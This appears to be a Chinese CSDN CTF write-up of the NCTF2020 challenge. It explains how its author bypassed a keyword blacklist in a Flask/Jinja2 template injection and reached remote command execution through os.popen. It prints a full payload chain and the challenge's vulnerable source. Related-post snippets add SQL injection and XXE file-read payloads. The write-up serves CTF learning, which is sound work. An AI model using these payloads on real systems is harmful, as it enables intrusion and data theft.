NCTF2020 web 你就是我的master吗

最新推荐文章于 2023-04-01 17:26:34 发布
最新推荐文章于 2023-04-01 17:26:34 发布
阅读量474 收藏
点赞数 1
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/109965473
版权

周末水了一题 之前ssti的题都是直接用网上payload改的,这题由于环境差异 自己过了一遍流程 白嫖惯了还挺不习惯的 哈哈
在这里插入图片描述

页面内容随name参数值而改变,根据容器名称猜测为flask/jinjia2框架模板注入,验证确认为模板注入
在这里插入图片描述

用burp fuzz 下过滤了什么特殊符号class base mro config args init global等常用关键字也被过滤
在这里插入图片描述

Bypass就行 ’ 单引号用 " 双引号代替,_ 下划线用16进制的 \x5f 代替 . 点符号以及关键字被过滤用拼接绕过如[“cla”+“ss”]

?name={{()["\x5F\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"ses\x5f\x5f"][0]["\x5f\x5fsubc"+"lasses\x5f\x5f"]()}}

在这里插入图片描述

找他的基类(object)的子类,这里没有file无法读取文件(python3中并没有file类),选择通过warnings.catch_warnings类执行命令
__subclasses__().index(warnings.catch_warnings)本可以通过index直接获取这个类的位置但这过滤太多,大致估一下位置搜索对照一下,得到位置为167
获取位置后在用__global__看看该模块有哪些global函数

?name={{()["\x5F\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"ses\x5f\x5f"][0]["\x5f\x5fsubc"+"lasses\x5f\x5f"]()[166]["\x5F\x5fini"+"t\x5f\x5f"]["\x5F\x5fglo"+"bals\x5f\x5f"]["keys"]()}}

在这里插入图片描述

python中可以直接运行一些函数,例如int(),list()等等。这些函数可以在__builtins__得到
为了执行命令需要调用os模块

?name={{()["\x5F\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"ses\x5f\x5f"][0]["\x5f\x5fsubc"+"lasses\x5f\x5f"]()[166]["\x5F\x5fini"+"t\x5f\x5f"]["\x5F\x5fglo"+"bals\x5f\x5f"]["\x5F\x5fbuil"+"tins\x5f\x5f"]["\x5F\x5fim"+"port\x5f\x5f"]("os")}}

在这里插入图片描述

Python3.6的版本 用system函数执行命令

?name={{()["\x5F\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"ses\x5f\x5f"][0]["\x5f\x5fsubc"+"lasses\x5f\x5f"]()[166]["\x5F\x5fini"+"t\x5f\x5f"]["\x5F\x5fglo"+"bals\x5f\x5f"]["\x5F\x5fbuil"+"tins\x5f\x5f"]["\x5F\x5fim"+"port\x5f\x5f"]("os")["sys"+"tem"]("whoami")}}

在这里插入图片描述

成功执行但是system函数没回显 本来是想弹个shell或者curl发送数据到vps上的,测试vps能收到 能通外网,但过滤太多了都用不了参数
在这里插入图片描述

还好用popen("dir").read()有回显
最终payload:

?name={{()["\x5F\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"ses\x5f\x5f"][0]["\x5f\x5fsubc"+"lasses\x5f\x5f"]()[166]["\x5F\x5fini"+"t\x5f\x5f"]["\x5F\x5fglo"+"bals\x5f\x5f"]["\x5F\x5fbuil"+"tins\x5f\x5f"]["\x5F\x5fim"+"port\x5f\x5f"]("os")["popen"]("cat wo*")["read"]()}}

在这里插入图片描述

去掉bypas的部分其实就是下面这个:

[].__class__.__base__.__subclasses__()[166].__init__.__globals__['__builtins__']['__import__']("os").popen("dir").read()

顺便扒了源码

from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    blacklist = ['%','-',':','+','class','base','mro','_','config','args','init','global','.','\'','req','|','attr','get']
    
    for i in blacklist:
        if i in name:
         return Template('你真是个小可爱').render()

    t = Template("早安,打工人<br/>你就是我的" + name + "吗?<br/><!--   ?name=master  -->")
    return t.render()

if __name__ == "__main__":
app.run()
Arnoldqqq
关注
nctf 2018 web复现-手工sql注入
weidaxueshen1的博客
11-28 344
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0SCHEMA_NAME%a0from%a0information_schema.SCHEMATA%a0limit%a02,1),3||'1数据库名 http://ctfgame.acdxvfsvd.net:20001...
南邮ctf nctf CG-CTF web题writeup
XQin9T1an的博客
08-03 3006
0x01 签到题 题目链接:http://chinalover.sinaapp.com/web1/ 查看源码可得到flag flag:nctf{flag_admiaanaaaaaaaaaaa} 0x02 md5 collision 题目链接:http://chinalover.sinaapp.com/web19/ 题目给了源码 $md51 = md5('QNKCDZO'); $a = @$_G...
NCTF2020 你就是我的master
feng的博客
11-22 765
前言 第一次参加南邮的NCTF,表示题目出的质量很好,出题人也很好,平台也很好,交flag也不需要验证码(逃~),总的来说就是好,明年还会参加。 见证了过了1天PWN仍然0解的状况,南邮的PWN还是强啊。 总榜第一的大师傅还是强啊,但是为什么是梅子酒不是郁离歌呢?(逃~): Web题目的质量还是挺高的,虽然我不会。。。今年只能做出来最简单的那道SSTI,争取明年能再创新高。。 WP F12看源码,发现了?name=master,url传一下发现回显了,大概率是SSTI,经过测试是Jinja2的SSTI,然
CTFre-V&NCTF2020-strangeCpp
weixin_43046297的博客
05-15 679
https://buuoj.cn/challenges#[V&N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B]strangeCpp 先使用一下exe,发现是貌似检测系统环境变量的程序 然后放入ida,定位一下他这个程序的主函数 可以看到引用了很多字符串,看一下他引用的字符串的位置: 然后有一个细节值得我们注意,那就是byte_140021008这段字符串被跳过去了,被一个很可疑的函数sub_140013580引用,我们跟踪进去看一下 其实根.
[NCTF2020]babyRSA Writeup
bestkasscn的博客
11-29 515
[NCTF2020]babyRSA 题目描述 from Crypto.Util.number import * from flag import flag def nextPrime(n): n += 2 if n & 1 else 1 while not isPrime(n): n += 2 return n p = getPrime(1024) q = nextPrime(p) n = p * q e = 0x10001 d = inverse(e,
V&NCTF2020 CSRe
__ys的博客
03-30 151
CSRe 查壳 .NET文件,但打开后发现被混淆 用de4dot去混淆 在de4dot所在文件夹中打开cmd输入 .De4Dot 目标文件所在位置 生成的-cleaned文件即为去混淆后的文件 用dnSpy打开分析 找到与flag相关的代码进行分析 经过分析可知进行两次sha1解密后即可得到flag(在线解密网站) flag{1415turn} ...
[NCTF2022]calc学习
Aiwin的博客
04-01 689
[NCTF2022]calc学习
NCTF-Writeup
Yukikaze_cxy
05-30 1731
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 1951
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
[NCTF2019] web题-SQLi
BROTHERYY的博客
12-30 232
访问robots.txt发现hint.txt 继续访问hint.txt得到过滤信息 根据过滤信息写脚本进行注入 import requests import string from urllib import parse passwd = '' string = string.ascii_lowercase + string.digits + '_' url = 'http://7a1bc649-4a1d-4e5b-a7cd-cb187958a399.node3.buuoj.cn/index.ph.
NCTF2022 Web Writeup
渗透测试研究中心
12-08 692
1.calc 题目地址:http://116.205.139.166:8001/ 右键 /source 源码 @app.route("/calc",methods=['GET']) def calc(): ip = request.remote_addr num = request.values.get("num") log = "echo {0}{1}{2}> ...
NCTF2019-官方writeup
郁离歌丶的博客
05-08 2244
NCTF2019-官方writeup
2019-NCTF web writeup(下)
crispr的博客
11-28 785
2019-NCTF web writeup(下) 前言 由于某些不可抗力因素 ,导致NCTF的平台已经关闭,还没开源,所以我只能盗用我队友的图来进行个人总结了qwq。不过知识点应该都还齐全2333。 收货 4.chr()拼接绕过 5.preg_replace()函数/e漏洞(PHP7.0失效了qwq) 6.flask的SSTI注入 2019NCTF题目(下) 0x05 repl...
nctf-/x00
电风
05-06 1411
1.http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; e
2019-NCTF web writeup(上)
crispr的博客
11-26 1378
2019-NCTF web’s writeup 收货 1.php常见绕过姿势 2.XXE漏洞利用技巧及SSRF 3.文件上传绕过姿势 4.preg_replace函数的利用 0X01 easyphp <?php error_reporting(0); highlight_file(__file__); $string_1 = $_GET['str1']; $strin...
V&NCTF2021 几个题解writeup
03-18 783
pwn-hh 在ida中查看,先输入somethings然后去exec_code。 看到使用了prctl,使用seccomp-tools查看,屏蔽了execve,可以构造ORW kali@kali:~/ctf/pwn/ti/hh$ seccomp-tools dump ./hh line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001
2018 南邮 NCTF writeup(部分)更新中---
欢迎光临
11-27 2469
2018 南邮 NCTF writeup 周六的打南邮的比赛,做了一道签到题,接着是一道SQL注入,想了一上午,最终还是没有做出来,怪自己喜欢用sqlmap,加上自己做的sql注入题目少 签到题 点击链接直接跳转到百度了,用burpsoup重放一遍就OK了 滴!晨跑打卡 通过用burpsoup的sql fuzz测试了一下 发现注释了 空格 # - * 将注释全都过滤了,只能用单引号闭合 绕过...
VNCTF2021[WEB]
Y4tacker的博客
03-18 3675
文章目录前言Ez_gamenaiverealezjvavEasy_laravel 前言 这次比赛题目质量很好,本菜鸡做出了两道web题目,还是比较开心,只是赛后复现laravel一天半也没有成功,我好自闭啊 Ez_game 在game.js里面发现,直接放到console里面跑,得到flag ["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6
南邮CTF练习题——web
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
[NCTF2019]SQLi
最新发布
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值